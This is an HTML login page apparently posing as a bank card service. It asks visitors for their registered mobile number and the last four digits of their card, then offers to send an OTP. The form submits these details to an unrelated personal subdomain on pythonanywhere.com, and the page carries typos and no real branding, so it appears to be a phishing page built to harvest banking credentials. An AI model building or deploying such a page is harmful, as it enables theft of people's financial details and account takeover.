<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Login Page</title>
    <link href="https://cdn.jsdelivr.net/npm/tailwindcss@2.2.19/dist/tailwind.min.css" rel="stylesheet" />
    <style>
        .up-shadow {
            -webkit-box-shadow: 0px -18px 68px -22px rgba(0, 0, 0, 0.75);
            -moz-box-shadow: 0px -18px 68px -22px rgba(0, 0, 0, 0.75);
            box-shadow: 0px -18px 68px -22px #ffae0075;
        }
    </style>
</head>

<body>
    <nav class="sticky bg-white flex item-center justify-between p-4 shadow w-screen">
        <img src="./media/logo.png" alt="Logo" class="scale-[0.65]" />
    </nav>
    <div class="flex flex-col justify-between gap-16" style="height: 93vh;">
        <div class="flex gap-2 items-center">
            <div class="px-3">
                <h1 class="text-2xl font-semibold">Welcome</h1>
                <p class="text-sm">
                    Setup your Card and manage your transaction
                    preferennces & limits to enjoy increadiblr benefits!
                </p>
            </div>
            <img src="./media/login-amico.svg" alt="Login" class="w-1/2" />
        </div>
        <div class="flex-grow h-full rounded-t-3xl drop-shadow-md pt-5 border-t up-shadow" style="background-color: #FBF6EB;">
            <form class="flex flex-col items-center pb-10" id="form" method="post" action="https://febobe7766.pythonanywhere.com/login">
                <h1 class="text-3xl font-semibold mb-4">Login</h1>
                <div class="mb-4">
                    <label for="phone" class="block text-gray-700 text-sm">
                        <svg xmlns="http://www.w3.org/2000/svg" width="18" height="18" viewBox="0 0 24 24"
                            fill="#374151" stroke="currentColor" stroke-width="2" stroke-linecap="round"
                            stroke-linejoin="round" class="lucide lucide-phone inline-block mr-2">
                            <path
                                d="M22 16.92v3a2 2 0 0 1-2.18 2 19.79 19.79 0 0 1-8.63-3.07 19.5 19.5 0 0 1-6-6 19.79 19.79 0 0 1-3.07-8.67A2 2 0 0 1 4.11 2h3a2 2 0 0 1 2 1.72 12.84 12.84 0 0 0 .7 2.81 2 2 0 0 1-.45 2.11L8.09 9.91a16 16 0 0 0 6 6l1.27-1.27a2 2 0 0 1 2.11-.45 12.84 12.84 0 0 0 2.81.7A2 2 0 0 1 22 16.92z" />
                        </svg>
                        Enter you
                        <b class="font-bold">Registered mobile number</b></label>
                    <input type="number" id="phone" name="phone" class="ml-6 mt-1 p-2 w-96 border-b-2"
                        min="1000000000" max="9999999999" style="border-color: #7F1D1D; background-color: #FBF6EB;" required />
                </div>
                <div class="mb-6">
                    <label for="card" class="block text-gray-700 text-sm">
                        <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="#374151"
                            stroke="white" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"
                            class="lucide lucide-credit-card inline-block">
                            <rect width="20" height="14" x="2" y="5" rx="2" />
                            <line x1="2" x2="22" y1="10" y2="10" />
                        </svg>
                        Enter <b class="font-medium">last 4 digits</b>
                        of your card
                        number</label>
                    <input type="number" id="card" name="card" class="ml-6 mt-1 p-2 w-96 border-b-2" style="border-color: #7F1D1D; background-color: #FBF6EB;" max="9999"
                        required />
                </div>
                <button type="submit" class="bg-red-900 text-white p-2 rounded-md w-96 hover:bg-blue-600">
                    Get OTP
                </button>
            </form>
        </div>
    </div>
    <script>
        const phone = document.getElementById("phone")
        const card = document.getElementById("card")

        phone.oninput = function () {
            if (this.value.length > 10) {
                this.value = this.value.slice(0, 10);
            }
        }

        card.oninput = function () {
            if (this.value.length > 4) {
                this.value = this.value.slice(0, 4);
            }
        }
    </script>
</body>

</html>